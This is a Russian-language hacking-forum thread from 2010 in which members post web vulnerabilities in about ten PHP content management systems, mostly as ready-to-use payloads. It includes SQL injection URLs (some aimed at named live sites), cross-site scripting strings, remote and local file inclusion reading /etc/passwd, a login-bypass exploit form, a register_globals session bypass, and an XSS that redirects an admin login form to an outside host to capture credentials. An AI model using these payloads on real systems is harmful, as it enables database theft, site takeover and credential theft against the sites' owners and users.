HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 22.04.2010, 00:57
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

CuteMarks 1.0.2

Blind SQL inj

(если условие верно, то редирект!)

link_href.php
PHP код:
include "./include/config.inc";
include 
"./include/cm_functions.inc";

#Get the superglobal variable(s) before using them:
$lnk_id $_GET['lnk_id'];

# Make database connection and construct admin main screen
mysql_pconnect("$db_address:$db_port"$db_user$db_password) or db_error;
mysql_select_db($db_name) or db_error;

# An empty database produces a special message
$sql "SELECT lnk_url, lnk_hits FROM cm_links WHERE lnk_id=$lnk_id";
$return mysql_query($sql) or db_error;
$row mysql_fetch_array($return) or db_error;
$url $row[0];
$hits $row[1] + 1;
$sql "UPDATE cm_links SET lnk_hits = $hits WHERE lnk_id=$lnk_id";
mysql_query($sql) or db_error;
header("Location: $url"); 
include/cm_functions.php
PHP код:
function db_error($exit_flag) {
  echo 
"A database error occured, please try again<br>";
  
$exit_flag AND exit; 
Result:
http://localhost/cutemarks_1-0-2/link_href.php?lnk_id=[sql]
http://localhost/cutemarks_1-0-2/link_href.php?lnk_id=1+and+4=substring%28version%2 8%29,1,1%29--+

SQL inj
PHP код:
include "./include/config.inc";
include 
"./include/template.inc";
$lnk_id $_GET['lnk_id'];

# Load the template, retreive information from the database and fill
# in the template
mysql_pconnect("$db_address:$db_port"$db_user$db_password) or db_error;
mysql_select_db($db_name) or db_error;
$sql  "SELECT lnk_parent_id, lnk_name FROM cm_links WHERE lnk_id = $lnk_id";
$result mysql_query($sql) or db_error;
$row mysql_fetch_array($result) or db_error;
$tpl = new Template("./$tpl_path""remove");
$tpl->set_file("admin_move_lnk""admin_move_lnk.tpl");
$tpl->set_block("admin_move_lnk""cat_list""foo");
$tpl->set_var(array ("CSS_FILE"        => $css_file,
                     
"lnk_name"        => htmlentities($row[1]),
                     
"node_exp"        => $node_exp,
                     
"lnk_id"          => $lnk_id ));
$pID $row[0];

# Create a pulldown form element with all available categories
$sql "SELECT cat_id, cat_name FROM cm_categories ORDER BY cat_name";
$result mysql_query($sql) or db_error;
while (
$row mysql_fetch_array($result)) {
  
$tpl->set_var(array("cat_id"    => $row[0],
                      
"cat_label" => $row[1]));
  if (
$row[0] == $pID) {
    
$tpl->set_var("cat_selected""selected");
  } else {
    
$tpl->set_var("cat_selected""");
  }
  
$tpl->parse("foo""cat_list"TRUE);
}
$tpl->pparse("out""admin_move_lnk"); 

Result:

http://localhost/cutemarks_1-0-2/admin_move_lnk.php?lnk_id=[sql]
http://localhost/cutemarks_1-0-2/admin_move_lnk.php?lnk_id=-1+union+select+1,version%28%29
Цитата:
You want to move the link "5.1.40-community" to a new category. Please choose one of the available categories from the list and submit the change.
SQL inj
admin_rename_cat.php
PHP код:
include "./include/config.inc";
include 
"./include/template.inc";

$cat_id $_GET['cat_id'];
$node_exp $_GET['node_exp'];

# Load the template, retreive information from the database and fill
# in the template
mysql_pconnect("$db_address:$db_port"$db_user$db_password) or db_error;
mysql_select_db($db_name) or db_error;
$sql  "SELECT cat_name FROM cm_categories WHERE cat_id = $cat_id";
$result mysql_query($sql) or db_error;
$row mysql_fetch_array($result) or db_error;
$tpl = new Template("./$tpl_path""remove");
$tpl->set_file("admin_rename_cat""admin_rename_cat.tpl");
$tpl->set_var(array ("CSS_FILE"        => $css_file,
                     
"cat_name"        => htmlentities($row[0]),
                     
"node_exp"        => $node_exp,
                     
"cat_id"          => $cat_id ));
$tpl->pparse("out""admin_rename_cat"); 
Result:
http://localhost/cutemarks_1-0-2/admin_rename_cat.php?cat_id=[sql]
http://localhost/cutemarks_1-0-2/admin_rename_cat.php?cat_id=-1+union+select+version%28%29--+
Дырявый как # дальше не хочеться смотреть!

Последний раз редактировалось Strilo4ka; 22.04.2010 в 01:51..
 
Ответить с цитированием

  #2  
Старый 22.04.2010, 21:09
_iks_
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме:
1224548

Репутация: 134
По умолчанию

OsDate CMS
Сайт: http://www.tufat.com/
Версия: 2.54, последняя на данный момент.



Информация о таблицах:
../dbtest.php

Таким образом можно узнать префикс.

PHP-Info:

../admin/phpinfo.php
(права не нужны)

Раскрытия путей:

есть папка с именем forum, в ней лежат api для взаимодействия с установленными форумами, если же форумов нет, то выдаёт самые разнообразные ошибки(инклюд несуществующих файлов, ввызовы несуществующих функций) с раскрытием путей.

Список файлов:
../forum/smf_1-1_api.php
../forum/adminLogin.php
../forum/forum_db.php
../forum/myBB14_forum.php
../forum/myBB_forum.php
../forum/Phorum_forum.php
../forum/phpBB3_forum.php
../forum/phpBB_forum.php
../forum/smf11_forum.php
../forum/vBulletin_forum.php
../forum/userLogin.php

Также другие файлы:
../news.php?config[no_news]=asdf
../test.php
../chat/inc/cmses/osdateCMS_v25.php

XSS(пассивная):


../afflogin.php?errormsg=<sCript>alert(111);</sCript>

Отсутствует фильтрация.
RFI(register globals = On):
../forum/adminLogin.php?config[forum_installed]=http://site/index.php%00
../forum/userLogin.php?config[forum_installed]=../../../../../../../../../etc/passwd%00

Code:

PHP код:
if ( $config['forum_installed'] == '' || $config['forum_installed'] == 'None' ) {
    include_once(
'None_forum.php');
} else {
    include_once(
$config['forum_installed'] . '_forum.php');

Ранее уже выкладывалась.
 
Ответить с цитированием

Plume CMS 1.2.4
  #3  
Старый 24.04.2010, 17:16
_iks_
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме:
1224548

Репутация: 134
По умолчанию Plume CMS 1.2.4

Версия: 1.2.4 Final

RFI(register globals = on и, как я понял, сервер на винде, тк в Юникс системах регистр имеет значение):
/manager/tools/link/dbinstall.PhP?_PX_config[manager_path]=path%00

Уязвимый код:
PHP код:
if (basename($_SERVER['SCRIPT_NAME']) == 'dbinstall.php') exit;

include 
$_PX_config[manager_path] . "/path/lib/"
Саму идею обойти защиту путём изменения регистра предложили в этом посту: https://forum.antichat.ru/showpost.php?p=1704870&postcount=234 , однако порой этот файл редактируют, а ведь точно такая же уязвимость есть и в файле, указанном выше.

Раскрытия путей:

В папке ../manager/tools/* в каждой папке выдает ошибку, связанную с тем, что они используют функции, определённый в файлах, которые их подключают.

../manager/help.php?c[]=article&mode=
../manager/users.php?user_id[]=1
../manager/comments.php?op=all'

XSS(passive):
../manager/tools/visualedit/index.php?msg="><sCript>alert(111);</sCript>


SQL-иньекция(админка):

../manager/tools.php?p=link&id=-4+union+select+1,2,3,4,5,6,7&page=edit_link



Также можно узнать версию движка, обратившись к файлу, указанному ниже:

../manager/VERSION

Последний раз редактировалось _iks_; 24.04.2010 в 23:12..
 
Ответить с цитированием

Suppy 0.5.4
  #4  
Старый 28.04.2010, 11:33
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию Suppy 0.5.4

Suppy 0.5.4
Suppy is a small supportsystem based on PHP and MySQL. Beta !
Homepage: http://sourceforge.net/projects/suppy/

Пассивная XSS:
Цитата:
/login.php?error=%3Cscript%3Ealert();%3C/script%3E
Auth ByPass
/login.php
В Anmeldename:
1' or 1=1 /*
Passwort:
12345
Exploit:

PHP код:
<form method="post" action="http://site.com/login.php">
<
input name="name" type="text" value="1' or 1=1 -- " />
<
input name="pw" type="password" value="Ulalala"/>
<
input name="login" type="submit" value="Login" /> 

SQL Inj:
Цитата:
/bb/getfile.php?id=-1+union+select+1,2,3,4,5,6,7,8+--+
Code:
PHP код:
if(isset($_GET['id']) && isset($_SESSION['ID_user']))
{
    include_once(
'utils/dbcon.php');
    
$con = new DBcon();
    
$con->AddSQL("SELECT * FROM file ");
    
$con->AddSQL("WHERE ID_file=".$_GET['id']); 
 
Ответить с цитированием

  #5  
Старый 28.04.2010, 17:36
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Concrete CMS

-Пассивная XSS


Код:
http://www.concrete5.org/search/-/search/?query=%3E%22%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&submit=Go+%BB

******************

оффсайт:
http://www.concrete5.org/
скачать:
http://www.concrete5.org/download_file/-/view/12742/
 
Ответить с цитированием

  #6  
Старый 29.04.2010, 05:20
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Tribiq CMS 5.2.2b

Пассивная XSS:
Цитата:
/admin/adminlogin.php?desturl=%22%3E%3Cscript%3Ealert();% 3C/script%3E
Мутим чётко и дезрко (c):
Need: mg=off, хотя х.з., js такая весчь что можно и без кавычек обойтись.
Цитата:
/admin/adminlogin.php?desturl=%22%3E%3CSCRIPT%3Edocument. forms[0].action='http://xenk/index.php';%3C/script%3E
До изменения:
Цитата:
<form action="adminlogin.php" method="POST" name="f">

После изменения:
Цитата:
<form action="http://xenk/index.php" method="POST" name="f">
Админ вводит пасс/логин, и данные идут не в adminlogin.php, а в http://xenk/index.php.
 
Ответить с цитированием

  #7  
Старый 29.04.2010, 08:05
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

v.1.0 RyShell CMS

SQL Injection
пример сайта с этой кмс
Код:
http://www.papiorec.org/index.php?url=-8+union+select+unhex%28hex%28version%28%29%29%29--
на офф сайте тоже имеется SQL Injection:
Код:
http://www.ryshell.com/index2.php?url=-25+UNiON+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,unhex%28hex%28version%28%29%29%29,18,19,20,21--
хотя в админку можно попасть минуя авторизацию
http://www.ryshell.com/admin/admin.php
 
Ответить с цитированием

  #8  
Старый 29.04.2010, 18:39
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

ecoCMS
Site: www.ecocms.com
Vulnerability: Authorization bypass
Severity: High
Needs: register_globals=On
Exploit: /admin.php?_SESSION[user_in]=1
Reason: В admin.php переменная сессии $_SESSION['user_in'] определяется лишь если переданы неправильный логин и пароль:
PHP код:
<?php

/*
ecoCMS - Quick & easy to use Content Management System (CMS)
(c)2009 by ecoCMS.com - visit for PRO version.
*/

include('config.php');
if(
$_GET['panel']=='logout')session_destroy();

if(
$_POST['user'] && $_POST['pass']){
// user is trying to login here.
// verify his user/pass.
if($_POST['user']==constant('accessUser') && $_POST['pass']==constant('accessPass'))
$_SESSION['user_in']=1;
else
$Message 'Username or password incorrect!';
}

if(!
$_SESSION['user_in'])$HideContents=1;
else unset(
$HideContents);

?>
В admin.php переменная сессии $_SESSION['user_in'] определяется лишь если переданы неправильный логин и пароль. Следовательно. мы можем не передавая post-данные с логином и паролем, установить значение переменной сессии при register_globals=On.

Последний раз редактировалось shell_c0de; 06.05.2010 в 18:17..
 
Ответить с цитированием

  #9  
Старый 02.05.2010, 19:23
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

ISPmanager 4.3 Professional

Пассивная XSS:
Цитата:
/ispmgr?func=%3C/script%3E%22%3E%3Cscript%3Ealert();%3C/script%3E

Последний раз редактировалось Ctacok; 21.05.2010 в 18:31..
 
Ответить с цитированием

  #10  
Старый 06.05.2010, 16:48
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

Campsite (3.3.5)
Site: campsite.campware.org
Vulnerability: Remote File Inclusion || Local File Inclusion
Severity: High
Needs: register_globals=On
Exploit: /tests/test_autopublish.php?GLOBALS[g_campsiteDir]=RFI ; /classes/ObjectType.php?GLOBALS[g_campsiteDir]=RFI
Reason: В tests/test_autopublish.php, /classes/ObjectType.php и в других скриптах часто используемая глобальная переменная g_campsiteDir не определена. Она определена лишь в скрипте set_path.php, который в самом вышеуказанном скрипте не подключается.
Участок кода в tests/test_autopublish.php:
PHP код:
<?php
require_once($GLOBALS['g_campsiteDir']."/classes/Article.php");
require_once(
$GLOBALS['g_campsiteDir']."/classes/ArticlePublish.php");
require_once(
$GLOBALS['g_campsiteDir']."/classes/Issue.php");
require_once(
$GLOBALS['g_campsiteDir']."/classes/IssuePublish.php");
...
Участок кода в /classes/ObjectType.php:
PHP код:
<?php
/**
 * @package Campsite
 */

/**
 * Includes
 */
require_once($GLOBALS['g_campsiteDir'].'/classes/DatabaseObject.php');
require_once(
$GLOBALS['g_campsiteDir'].'/classes/Translation.php');
Следовательно. мы можем установить значение глобальной переменной и заинклудить произвольный файл при register_globals=On.
При allow_url_include=On/Off имеем RFI/LFI соответственно. Для проведения LFI скорее всего понадобится ещё и magic_quotes_gpc=On для того, чтобы обрезать лишнее нулл-байтом.
При register_globals=Off имеем лишь раскрытие путей.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ